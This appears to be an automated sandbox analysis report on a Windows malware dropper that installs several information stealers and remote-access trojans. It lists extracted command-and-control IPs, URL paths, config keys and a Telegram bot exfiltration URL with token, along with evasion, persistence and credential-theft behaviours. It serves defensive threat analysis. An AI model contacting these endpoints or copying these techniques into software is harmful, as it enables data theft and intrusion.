Analysis
max time kernel: 83s
max time network: 138s
platform: windows11-21h2_x64
resource: win11-20240426-en
resource tags: arch:x64 arch:x86 image:win11-20240426-en locale:en-us os:windows11-21h2-x64 system
submitted: 28-04-2024 04:34
Static task: static1
Behavioral task: behavioral1
  Sample: 6ff71066514f9902a3764a55ad402c6e02a80664c2edfd33984f34a61852f350.exe
  Resource: win10v2004-20240419-en
Behavioral task: behavioral2
  Sample: 6ff71066514f9902a3764a55ad402c6e02a80664c2edfd33984f34a61852f350.exe
  Resource: win11-20240426-en
Errors
General
Target: 6ff71066514f9902a3764a55ad402c6e02a80664c2edfd33984f34a61852f350.exe
Size: 1.8MB
MD5: b9b1e4b2d6a24099e21fe77067dd7098
SHA1: bc5b3fd64b2ad7215fb8176ab4022ec9c8b664b2
SHA256: 6ff71066514f9902a3764a55ad402c6e02a80664c2edfd33984f34a61852f350
SHA512: a183e65e7f8f50cbc952db6bcd1378d1d68604e355cec3c9cbd7e34acb350a883a3de42764de5cdd91675ca028aa9cd179f61bfb402f07a0af6368d3a351b5d5
SSDEEP: 49152:O3/bnp8W4MEx3c5tOnhRcns+n5I8MXTeGTp6gg/VSmk:Ojnpzyx3c5Mzcv5I8MX6GTYSf
Malware Config
Extracted: amadey 4.20
  http://193.233.132.139
  install_dir: 5454e6f062
  install_file: explorta.exe
  strings_key: c7a869c5ba1d72480093ec207994e2bf
  url_paths: /sev56rkm/index.php
Extracted: amadey 4.17
  http://193.233.132.167
  install_dir: 4d0ab15804
  install_file: chrosha.exe
  strings_key: 1a9519d7b465e1f4880fa09a6162d768
  url_paths: /enigma/index.php
Extracted: redline
  @CLOUDYTTEAM
  185.172.128.33:8970
Extracted: redline
  Test1234
  185.215.113.67:26260
Extracted: stealc
  http://52.143.157.84
  http://185.172.128.62
  url_path: /c73eed764cc59dcb.php
Extracted: xworm 5.0
  127.0.0.1:7000
  91.92.252.220:7000
  41.199.23.195:7000
  saveclinetsforme68465454711991.publicvm.com:7000
  bBT8anvIxhxDFmkf
  Install_directory: %AppData%
  install_file: explorer.exe
  telegram: https://api.telegram.org/bot2128988424:AAEkYnwvOQA95riqRZwlqBxg4GV-odRNOyo/sendMessage?chat_id=966649672
Signatures
Detect Xworm Payload 2 IoCs
Processes:
- C:\Users\Admin\AppData\Local\Temp\1000239001\mstc.exe: family_xworm
- behavioral2/memory/5320-760-0x0000000000170000-0x0000000000182000-memory.dmp: family_xworm
Detect ZGRat V1 6 IoCs
Processes:
- behavioral2/memory/3716-230-0x0000000000400000-0x0000000000592000-memory.dmp: family_zgrat_v1
- C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe: family_zgrat_v1
- behavioral2/memory/4592-289-0x0000000000570000-0x0000000000630000-memory.dmp: family_zgrat_v1
- behavioral2/memory/7160-1287-0x0000019088870000-0x000001908C168000-memory.dmp: family_zgrat_v1
- behavioral2/memory/7160-1310-0x00000190A6940000-0x00000190A6A50000-memory.dmp: family_zgrat_v1
- behavioral2/memory/7160-1316-0x000001908DEA0000-0x000001908DEC4000-memory.dmp: family_zgrat_v1
Glupteba payload 1 IoCs
Processes:
- behavioral2/memory/5760-1061-0x0000000000400000-0x0000000001DFB000-memory.dmp: family_glupteba
Modifies firewall policy service 2 TTPs 1 IoCs
Processes:
- 87SWjL22hQPaCpSfqo5grzwC.exe: Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1"
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
RedLine payload 6 IoCs
Processes:
- C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe: family_redline
- C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe: family_redline
- behavioral2/memory/5024-253-0x00000000003F0000-0x0000000000442000-memory.dmp: family_redline
- behavioral2/memory/4592-289-0x0000000000570000-0x0000000000630000-memory.dmp: family_redline
- C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe: family_redline
- behavioral2/memory/4548-352-0x0000000000480000-0x00000000004D2000-memory.dmp: family_redline
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 7 IoCs
Processes:
- amert.exe: Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__
- 1d10cce2fa.exe: Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__
- chrosha.exe: Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__
- explorta.exe: Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__
- 87SWjL22hQPaCpSfqo5grzwC.exe: Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__
- 6ff71066514f9902a3764a55ad402c6e02a80664c2edfd33984f34a61852f350.exe: Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__
- explorta.exe: Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Blocklisted process makes network request 2 IoCs
Processes:
- flow 77: PID 5744 rundll32.exe
- flow 115: PID 6124 rundll32.exe
Downloads MZ/PE file
Modifies Windows Firewall 2 TTPs 3 IoCs
Processes:
- 856 netsh.exe
- 6268 netsh.exe
- 3344 netsh.exe
Checks BIOS information in registry 2 TTPs 15 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
- 87SWjL22hQPaCpSfqo5grzwC.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion
- 6ff71066514f9902a3764a55ad402c6e02a80664c2edfd33984f34a61852f350.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion
- explorta.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion
- explorta.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
- explorta.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion
- 87SWjL22hQPaCpSfqo5grzwC.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
- Install.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
- 6ff71066514f9902a3764a55ad402c6e02a80664c2edfd33984f34a61852f350.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
- amert.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion
- chrosha.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
- amert.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
- 1d10cce2fa.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion
- explorta.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
- 1d10cce2fa.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
- chrosha.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion
Executes dropped EXE 37 IoCs
Processes:
- 4904 explorta.exe
- 3164 amert.exe
- 3184 06e517567e.exe
- 1620 1d10cce2fa.exe
- 4288 chrosha.exe
- 1408 explorta.exe
- 1332 swiiiii.exe
- 4432 alexxxxxxxx.exe
- 5024 keks.exe
- 4592 trf.exe
- 4452 gold.exe
- 416 NewB.exe
- 3240 ISetup8.exe
- 4548 jok.exe
- 2344 swiiii.exe
- 5172 toolspub1.exe
- 5368 u2i0.0.exe
- 5540 lie.exe
- 5324 file300un.exe
- 5208 run.exe
- 5760 4767d2e713f2021e8fe856e3ea638b58.exe
- 5312 u2i0.3.exe
- 5320 mstc.exe
- 2296 JsU0mIy1ntpEgKLvpkZIxeHv.exe
- 5668 0uGYhodtbvJDiZVw84LSAglJ.exe
- 4128 wPMduSZ8juY1TDHBUix0ljLR.exe
- 5172 87SWjL22hQPaCpSfqo5grzwC.exe
- 5964 u1rs.0.exe
- 4876 BCeXl9xTBcqb6RTpV0ci0ClD.exe
- 3000 BCeXl9xTBcqb6RTpV0ci0ClD.exe
- 4000 BCeXl9xTBcqb6RTpV0ci0ClD.exe
- 5600 BCeXl9xTBcqb6RTpV0ci0ClD.exe
- 6040 BCeXl9xTBcqb6RTpV0ci0ClD.exe
- 6132 run.exe
- 2748 TSG0dxvUxIJDY4V4LguJj7eN.exe
- 5548 Install.exe
- 3172 u1rs.3.exe
Identifies Wine through registry keys 2 TTPs 6 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.
Processes:
- amert.exe: Key opened \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Wine
- 1d10cce2fa.exe: Key opened \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Wine
- chrosha.exe: Key opened \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Wine
- explorta.exe: Key opened \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Wine
- 6ff71066514f9902a3764a55ad402c6e02a80664c2edfd33984f34a61852f350.exe: Key opened \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Wine
- explorta.exe: Key opened \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Wine
Loads dropped DLL 12 IoCs
Processes:
- 5700 rundll32.exe
- 5744 rundll32.exe
- 5208 run.exe
- 32 RegAsm.exe
- 32 RegAsm.exe
- 6124 rundll32.exe
- 4876 BCeXl9xTBcqb6RTpV0ci0ClD.exe
- 3000 BCeXl9xTBcqb6RTpV0ci0ClD.exe
- 4000 BCeXl9xTBcqb6RTpV0ci0ClD.exe
- 5600 BCeXl9xTBcqb6RTpV0ci0ClD.exe
- 6040 BCeXl9xTBcqb6RTpV0ci0ClD.exe
- 6132 run.exe
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
Processes:
- C:\Users\Admin\Pictures\87SWjL22hQPaCpSfqo5grzwC.exe: themida
- behavioral2/memory/5172-850-0x0000000140000000-0x000000014072B000-memory.dmp: themida
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
- explorta.exe: Set value (str) \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Microsoft\Windows\CurrentVersion\Run\1d10cce2fa.exe = "C:\\Users\\Admin\\1000017002\\1d10cce2fa.exe"
- explorta.exe: Set value (str) \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Microsoft\Windows\CurrentVersion\Run\06e517567e.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000016001\\06e517567e.exe"
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
Processes:
- 87SWjL22hQPaCpSfqo5grzwC.exe: Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA
Enumerates connected drives 3 TTPs 4 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
- BCeXl9xTBcqb6RTpV0ci0ClD.exe: File opened (read-only) \??\D:
- BCeXl9xTBcqb6RTpV0ci0ClD.exe: File opened (read-only) \??\F:
- BCeXl9xTBcqb6RTpV0ci0ClD.exe: File opened (read-only) \??\D:
- BCeXl9xTBcqb6RTpV0ci0ClD.exe: File opened (read-only) \??\F:
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
- flow 109: api.myip.com
- flow 111: api.myip.com
- flow 113: ipinfo.io
- flow 114: ipinfo.io
- flow 118: ip-api.com
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
Processes:
- C:\Users\Admin\AppData\Local\Temp\1000016001\06e517567e.exe: autoit_exe
Drops file in System32 directory 4 IoCs
Processes:
- 87SWjL22hQPaCpSfqo5grzwC.exe: File opened for modification C:\Windows\System32\GroupPolicy
- 87SWjL22hQPaCpSfqo5grzwC.exe: File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini
- 87SWjL22hQPaCpSfqo5grzwC.exe: File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol
- 87SWjL22hQPaCpSfqo5grzwC.exe: File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI
Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
Processes:
- 1372 6ff71066514f9902a3764a55ad402c6e02a80664c2edfd33984f34a61852f350.exe
- 4904 explorta.exe
- 3164 amert.exe
- 1620 1d10cce2fa.exe
- 4288 chrosha.exe
- 1408 explorta.exe
- 5172 87SWjL22hQPaCpSfqo5grzwC.exe
Suspicious use of SetThreadContext 7 IoCs
Processes:
- PID 1332 swiiiii.exe set thread context of PID 4012 RegAsm.exe
- PID 4432 alexxxxxxxx.exe set thread context of PID 3716 RegAsm.exe
- PID 4452 gold.exe set thread context of PID 8 RegAsm.exe
- PID 2344 swiiii.exe set thread context of PID 32 RegAsm.exe
- PID 5324 file300un.exe set thread context of PID 5500 AddInProcess32.exe
- PID 5208 run.exe set thread context of PID 5992 cmd.exe
- PID 6132 run.exe set thread context of PID 1212 cmd.exe
Drops file in Windows directory 3 IoCs
Processes:
- 6ff71066514f9902a3764a55ad402c6e02a80664c2edfd33984f34a61852f350.exe: File created C:\Windows\Tasks\explorta.job
- amert.exe: File created C:\Windows\Tasks\chrosha.job
- schtasks.exe: File created C:\Windows\Tasks\biPxHmULFllsbMgnpt.job
Launches sc.exe 1 IoCs
Sc.exe is a Windows utility to control services on the system.
Processes:
- 6188 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Program crash 7 IoCs
Processes:
- PID 3056 WerFault.exe, target PID 1332 swiiiii.exe
- PID 4976 WerFault.exe, target PID 4432 alexxxxxxxx.exe
- PID 4504 WerFault.exe, target PID 4452 gold.exe
- PID 5404 WerFault.exe, target PID 5172 toolspub1.exe
- PID 5496 WerFault.exe, target PID 3240 ISetup8.exe
- PID 2864 WerFault.exe, target PID 2296 JsU0mIy1ntpEgKLvpkZIxeHv.exe
- PID 6232 WerFault.exe, target PID 5964 u1rs.0.exe
Checks SCSI registry key(s) 3 TTPs 9 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
- toolspub1.exe: Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI
- u1rs.3.exe: Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI
- u1rs.3.exe: Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI
- u1rs.3.exe: Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI
- toolspub1.exe: Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI
- toolspub1.exe: Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI
- u2i0.3.exe: Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI
- u2i0.3.exe: Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI
- u2i0.3.exe: Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
- RegAsm.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString
- u1rs.0.exe: Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
- u1rs.0.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString
- RegAsm.exe: Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Creates scheduled task(s) 1 TTPs 7 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
- 3740 schtasks.exe
- 3480 schtasks.exe
- 2248 schtasks.exe
- 7152 schtasks.exe
- 1264 schtasks.exe
- 6364 schtasks.exe
- 6096 schtasks.exe
Enumerates system info in registry 2 TTPs 5 IoCs
Processes:
- Install.exe: Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS
- Install.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName
- chrome.exe: Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS
- chrome.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName
- chrome.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer
Modifies data under HKEY_USERS 2 IoCs
Processes:
- chrome.exe: Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry
- chrome.exe: Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133587524756945171"
Modifies registry class 1 IoCs
Processes:
- chrome.exe: Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3938118698-2964058152-2337880935-1000\{0CB1B6CF-2247-4B4D-895B-06D3A9DA2475}
Processes:
- keks.exe: Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064
- keks.exe: Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 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
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
- 1372 6ff71066514f9902a3764a55ad402c6e02a80664c2edfd33984f34a61852f350.exe
- 1372 6ff71066514f9902a3764a55ad402c6e02a80664c2edfd33984f34a61852f350.exe
- 4904 explorta.exe
- 4904 explorta.exe
- 3164 amert.exe
- 3164 amert.exe
- 3712 chrome.exe
- 3712 chrome.exe
- 1620 1d10cce2fa.exe
- 1620 1d10cce2fa.exe
- 4288 chrosha.exe
- 4288 chrosha.exe
- 1408 explorta.exe
- 1408 explorta.exe
- 32 RegAsm.exe
- 32 RegAsm.exe
- 5744 rundll32.exe
- 5744 rundll32.exe
- 5744 rundll32.exe
- 5744 rundll32.exe
- 5744 rundll32.exe
- 5744 rundll32.exe
- 5024 keks.exe
- 5024 keks.exe
- 4592 trf.exe
- 4592 trf.exe
- 5208 run.exe
- 4592 trf.exe
- 4592 trf.exe
- 4592 trf.exe
- 4592 trf.exe
- 4592 trf.exe
- 4592 trf.exe
- 4592 trf.exe
- 4592 trf.exe
- 4592 trf.exe
- 4592 trf.exe
- 4592 trf.exe
- 4592 trf.exe
- 4592 trf.exe
- 4592 trf.exe
- 4592 trf.exe
- 4592 trf.exe
- 4592 trf.exe
- 4592 trf.exe
- 5208 run.exe
- 5208 run.exe
- 5744 rundll32.exe
- 5744 rundll32.exe
- 5744 rundll32.exe
- 5744 rundll32.exe
- 32 RegAsm.exe
- 32 RegAsm.exe
- 5824 powershell.exe
- 5824 powershell.exe
- 5824 powershell.exe
- 4548 jok.exe
- 4548 jok.exe
- 5024 keks.exe
- 5024 keks.exe
- 5024 keks.exe
- 5024 keks.exe
- 5024 keks.exe
- 5024 keks.exe
Suspicious behavior: MapViewOfSection 2 IoCs
Processes:
- 5208 run.exe
- 6132 run.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
Processes:
- 3712 chrome.exe
- 3712 chrome.exe
- 3712 chrome.exe
- 3712 chrome.exe
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
- 3712 chrome.exe: Token: SeShutdownPrivilege
- 3712 chrome.exe: Token: SeCreatePagefilePrivilege
- 3712 chrome.exe: Token: SeShutdownPrivilege
- 3712 chrome.exe: Token: SeCreatePagefilePrivilege
- 3712 chrome.exe: Token: SeShutdownPrivilege
- 3712 chrome.exe: Token: SeCreatePagefilePrivilege
- 3712 chrome.exe: Token: SeShutdownPrivilege
- 3712 chrome.exe: Token: SeCreatePagefilePrivilege
- 3712 chrome.exe: Token: SeShutdownPrivilege
- 3712 chrome.exe: Token: SeCreatePagefilePrivilege
- 3712 chrome.exe: Token: SeShutdownPrivilege
- 3712 chrome.exe: Token: SeCreatePagefilePrivilege
- 3712 chrome.exe: Token: SeShutdownPrivilege
- 3712 chrome.exe: Token: SeCreatePagefilePrivilege
- 3712 chrome.exe: Token: SeShutdownPrivilege
- 3712 chrome.exe: Token: SeCreatePagefilePrivilege
- 3712 chrome.exe: Token: SeShutdownPrivilege
- 3712 chrome.exe: Token: SeCreatePagefilePrivilege
- 3712 chrome.exe: Token: SeShutdownPrivilege
- 3712 chrome.exe: Token: SeCreatePagefilePrivilege
- 3712 chrome.exe: Token: SeShutdownPrivilege
- 3712 chrome.exe: Token: SeCreatePagefilePrivilege
- 3712 chrome.exe: Token: SeShutdownPrivilege
- 3712 chrome.exe: Token: SeCreatePagefilePrivilege
- 3712 chrome.exe: Token: SeShutdownPrivilege
- 3712 chrome.exe: Token: SeCreatePagefilePrivilege
- 3712 chrome.exe: Token: SeShutdownPrivilege
- 3712 chrome.exe: Token: SeCreatePagefilePrivilege
- 3712 chrome.exe: Token: SeShutdownPrivilege
- 3712 chrome.exe: Token: SeCreatePagefilePrivilege
- 3712 chrome.exe: Token: SeShutdownPrivilege
- 3712 chrome.exe: Token: SeCreatePagefilePrivilege
- 3712 chrome.exe: Token: SeShutdownPrivilege
- 3712 chrome.exe: Token: SeCreatePagefilePrivilege
- 3712 chrome.exe: Token: SeShutdownPrivilege
- 3712 chrome.exe: Token: SeCreatePagefilePrivilege
- 3712 chrome.exe: Token: SeShutdownPrivilege
- 3712 chrome.exe: Token: SeCreatePagefilePrivilege
- 3712 chrome.exe: Token: SeShutdownPrivilege
- 3712 chrome.exe: Token: SeCreatePagefilePrivilege
- 3712 chrome.exe: Token: SeShutdownPrivilege
- 3712 chrome.exe: Token: SeCreatePagefilePrivilege
- 3712 chrome.exe: Token: SeShutdownPrivilege
- 3712 chrome.exe: Token: SeCreatePagefilePrivilege
- 3712 chrome.exe: Token: SeShutdownPrivilege
- 3712 chrome.exe: Token: SeCreatePagefilePrivilege
- 3712 chrome.exe: Token: SeShutdownPrivilege
- 3712 chrome.exe: Token: SeCreatePagefilePrivilege
- 3712 chrome.exe: Token: SeShutdownPrivilege
- 3712 chrome.exe: Token: SeCreatePagefilePrivilege
- 3712 chrome.exe: Token: SeShutdownPrivilege
- 3712 chrome.exe: Token: SeCreatePagefilePrivilege
- 3712 chrome.exe: Token: SeShutdownPrivilege
- 3712 chrome.exe: Token: SeCreatePagefilePrivilege
- 3712 chrome.exe: Token: SeShutdownPrivilege
- 3712 chrome.exe: Token: SeCreatePagefilePrivilege
- 3712 chrome.exe: Token: SeShutdownPrivilege
- 3712 chrome.exe: Token: SeCreatePagefilePrivilege
- 3712 chrome.exe: Token: SeShutdownPrivilege
- 3712 chrome.exe: Token: SeCreatePagefilePrivilege
- 3712 chrome.exe: Token: SeShutdownPrivilege
- 3712 chrome.exe: Token: SeCreatePagefilePrivilege
- 3712 chrome.exe: Token: SeShutdownPrivilege
- 3712 chrome.exe: Token: SeCreatePagefilePrivilege
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
- 3184 06e517567e.exe
- 3184 06e517567e.exe
- 3712 chrome.exe
- 3712 chrome.exe
- 3712 chrome.exe
- 3712 chrome.exe
- 3712 chrome.exe
- 3712 chrome.exe
- 3712 chrome.exe
- 3712 chrome.exe
- 3712 chrome.exe
- 3712 chrome.exe
- 3712 chrome.exe
- 3712 chrome.exe
- 3712 chrome.exe
- 3712 chrome.exe
- 3712 chrome.exe
- 3712 chrome.exe
- 3712 chrome.exe
- 3712 chrome.exe
- 3712 chrome.exe
- 3712 chrome.exe
- 3712 chrome.exe
- 3712 chrome.exe
- 3712 chrome.exe
- 3712 chrome.exe
- 3184 06e517567e.exe
- 3712 chrome.exe
- 3184 06e517567e.exe
- 3184 06e517567e.exe
- 3184 06e517567e.exe
- 3184 06e517567e.exe
- 3184 06e517567e.exe
- 3184 06e517567e.exe
- 3712 chrome.exe
- 3184 06e517567e.exe
- 3184 06e517567e.exe
- 3184 06e517567e.exe
- 3184 06e517567e.exe
- 3184 06e517567e.exe
- 3184 06e517567e.exe
- 3184 06e517567e.exe
- 3184 06e517567e.exe
- 3184 06e517567e.exe
- 3184 06e517567e.exe
- 3184 06e517567e.exe
- 3184 06e517567e.exe
- 3184 06e517567e.exe
- 3184 06e517567e.exe
- 3184 06e517567e.exe
- 3184 06e517567e.exe
- 3184 06e517567e.exe
- 3184 06e517567e.exe
- 3184 06e517567e.exe
- 3184 06e517567e.exe
- 3184 06e517567e.exe
- 3184 06e517567e.exe
- 3184 06e517567e.exe
- 3184 06e517567e.exe
- 3184 06e517567e.exe
- 3184 06e517567e.exe
- 3184 06e517567e.exe
- 3184 06e517567e.exe
- 3184 06e517567e.exe
Suspicious use of SendNotifyMessage 57 IoCs
Processes:
- 3184 06e517567e.exe
- 3184 06e517567e.exe
- 3712 chrome.exe
- 3712 chrome.exe
- 3712 chrome.exe
- 3712 chrome.exe
- 3712 chrome.exe
- 3712 chrome.exe
- 3712 chrome.exe
- 3712 chrome.exe
- 3712 chrome.exe
- 3712 chrome.exe
- 3712 chrome.exe
- 3712 chrome.exe
- 3184 06e517567e.exe
- 3184 06e517567e.exe
- 3184 06e517567e.exe
- 3184 06e517567e.exe
- 3184 06e517567e.exe
- 3184 06e517567e.exe
- 3184 06e517567e.exe
- 3184 06e517567e.exe
- 3184 06e517567e.exe
- 3184 06e517567e.exe
- 3184 06e517567e.exe
- 3184 06e517567e.exe
- 3184 06e517567e.exe
- 3184 06e517567e.exe
- 3184 06e517567e.exe
- 3184 06e517567e.exe
- 3184 06e517567e.exe
- 3184 06e517567e.exe
- 3184 06e517567e.exe
- 3184 06e517567e.exe
- 3184 06e517567e.exe
- 3184 06e517567e.exe
- 3184 06e517567e.exe
- 3184 06e517567e.exe
- 3184 06e517567e.exe
- 3184 06e517567e.exe
- 3184 06e517567e.exe
- 3184 06e517567e.exe
- 3184 06e517567e.exe
- 3184 06e517567e.exe
- 3184 06e517567e.exe
- 3184 06e517567e.exe
- 3184 06e517567e.exe
- 3184 06e517567e.exe
- 3184 06e517567e.exe
- 3184 06e517567e.exe
- 5312 u2i0.3.exe
- 5312 u2i0.3.exe
- 5312 u2i0.3.exe
- 5312 u2i0.3.exe
- 5312 u2i0.3.exe
- 5312 u2i0.3.exe
- 5312 u2i0.3.exe
Suspicious use of SetWindowsHookEx 4 IoCs
Processes:
- 5208 run.exe
- 5208 run.exe
- 6132 run.exe
- 6132 run.exe
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
- PID 1372 6ff71066514f9902a3764a55ad402c6e02a80664c2edfd33984f34a61852f350.exe wrote to memory of PID 4904 explorta.exe
- PID 1372 6ff71066514f9902a3764a55ad402c6e02a80664c2edfd33984f34a61852f350.exe wrote to memory of PID 4904 explorta.exe
- PID 1372 6ff71066514f9902a3764a55ad402c6e02a80664c2edfd33984f34a61852f350.exe wrote to memory of PID 4904 explorta.exe
- PID 4904 explorta.exe wrote to memory of PID 4884 explorta.exe
- PID 4904 explorta.exe wrote to memory of PID 4884 explorta.exe
- PID 4904 explorta.exe wrote to memory of PID 4884 explorta.exe
- PID 4904 explorta.exe wrote to memory of PID 3164 amert.exe
- PID 4904 explorta.exe wrote to memory of PID 3164 amert.exe
- PID 4904 explorta.exe wrote to memory of PID 3164 amert.exe
- PID 4904 explorta.exe wrote to memory of PID 3184 06e517567e.exe
- PID 4904 explorta.exe wrote to memory of PID 3184 06e517567e.exe
- PID 4904 explorta.exe wrote to memory of PID 3184 06e517567e.exe
- PID 3184 06e517567e.exe wrote to memory of PID 3712 chrome.exe
- PID 3184 06e517567e.exe wrote to memory of PID 3712 chrome.exe
- PID 3712 chrome.exe wrote to memory of PID 2416 chrome.exe
- PID 3712 chrome.exe wrote to memory of PID 2416 chrome.exe
- PID 3712 chrome.exe wrote to memory of PID 2612 chrome.exe
- PID 3712 chrome.exe wrote to memory of PID 2612 chrome.exe
- PID 3712 chrome.exe wrote to memory of PID 2612 chrome.exe
- PID 3712 chrome.exe wrote to memory of PID 2612 chrome.exe
- PID 3712 chrome.exe wrote to memory of PID 2612 chrome.exe
- PID 3712 chrome.exe wrote to memory of PID 2612 chrome.exe
- PID 3712 chrome.exe wrote to memory of PID 2612 chrome.exe
- PID 3712 chrome.exe wrote to memory of PID 2612 chrome.exe
- PID 3712 chrome.exe wrote to memory of PID 2612 chrome.exe
- PID 3712 chrome.exe wrote to memory of PID 2612 chrome.exe
- PID 3712 chrome.exe wrote to memory of PID 2612 chrome.exe
- PID 3712 chrome.exe wrote to memory of PID 2612 chrome.exe
- PID 3712 chrome.exe wrote to memory of PID 2612 chrome.exe
- PID 3712 chrome.exe wrote to memory of PID 2612 chrome.exe
- PID 3712 chrome.exe wrote to memory of PID 2612 chrome.exe
- PID 3712 chrome.exe wrote to memory of PID 2612 chrome.exe
